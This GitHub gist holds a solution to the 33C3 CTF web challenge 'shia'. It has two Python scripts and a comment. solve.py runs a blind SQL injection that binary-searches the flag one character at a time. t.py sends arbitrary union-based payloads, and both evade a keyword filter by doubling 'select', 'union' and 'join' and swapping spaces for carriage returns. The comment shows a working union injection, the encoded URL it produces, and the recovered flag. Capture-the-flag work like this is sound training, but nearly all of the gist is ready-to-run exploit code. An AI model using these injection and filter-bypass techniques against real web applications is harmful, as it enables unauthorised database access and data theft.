Skip to content

Instantly share code, notes, and snippets.

@st98

st98/solve.py

Last active January 2, 2017 00:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save st98/24776a974fb68bae63205bfdd486ebdd to your computer and use it in GitHub Desktop.
Save st98/24776a974fb68bae63205bfdd486ebdd to your computer and use it in GitHub Desktop.
Download ZIP
33C3 CTF - [web 175] shia
Raw
solve.py
import requests
import urllib.parse
def check(s):
return b"Don't let your dreams be dreams!" in s
url = 'http://78.46.224.75/quote/'
query = '(select substring(y from {} for 1) <= binary 0x{:x} from (select * from (select 1 u)a join (select 2 x)b join (select 3 y)c join (select 4 z)d union select * from flag)f where y like 0x253333433325 limit 1)'
i = 1
res = ''
while True:
high = 0x7e
low = -1
while abs(high - low) > 1:
mid = (high + low) // 2
q = query.format(i, mid)
q = q.replace(' ', '\r')
q = q.replace('select', 'sselectelect')
q = q.replace('union', 'uunionnion')
q = q.replace('join', 'jjoinoin')
q = urllib.parse.quote(q)
c = requests.get(url + q)
if check(c.content):
high = mid
else:
low = mid
res += chr(high)
print(i, res)
i += 1
Raw
t.py
import requests
import sys
import urllib.parse
if len(sys.argv) < 2:
sys.exit(0)
p = sys.argv[1]
p = p.replace(' ', '\r')
p = p.replace('select', 'sselectelect')
p = p.replace('union', 'uunionnion')
p = p.replace('join', 'jjoinoin')
p = urllib.parse.quote(p)
u = 'http://78.46.224.75/quote/' + p
print(u)
print(requests.get(u).content)
@st98
Copy link
Author

st98 commented Dec 31, 2016

solve.pyではわざわざBlind SQLiしてるけど

$ python2 t.py '0 union select * from (select 1)a join (select y from (select * from (select 1 u)a join (select 2 x)b join (select 3 y)c join (select 4 z)d union select * from flag)f where y like 0x253333433325 limit 1)b join (select 3)c'
http://78.46.224.75/quote/0%0Duunionnion%0Dsselectelect%0D%2A%0Dfrom%0D%28sselectelect%0D1%29a%0Djjoinoin%0D%28sselectelect%0Dy%0Dfrom%0D%28sselectelect%0D%2A%0Dfrom%0D%28sselectelect%0D1%0Du%29a%0Djjoinoin%0D%28sselectelect%0D2%0Dx%29b%0Djjoinoin%0D%28sselectelect%0D3%0Dy%29c%0Djjoinoin%0D%28sselectelect%0D4%0Dz%29d%0Duunionnion%0Dsselectelect%0D%2A%0Dfrom%0Dflag%29f%0Dwhere%0Dy%0Dlike%0D0x253333433325%0Dlimit%0D1%29b%0Djjoinoin%0D%28sselectelect%0D3%29c
{
  "reason": "<p><strong>33C3_runnn!ng_for_your_life_fRom_shia_!</strong></p><p><footer>by Shia - added 3</footer></p>", 
  "success": 1
}

の方が楽だった…

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment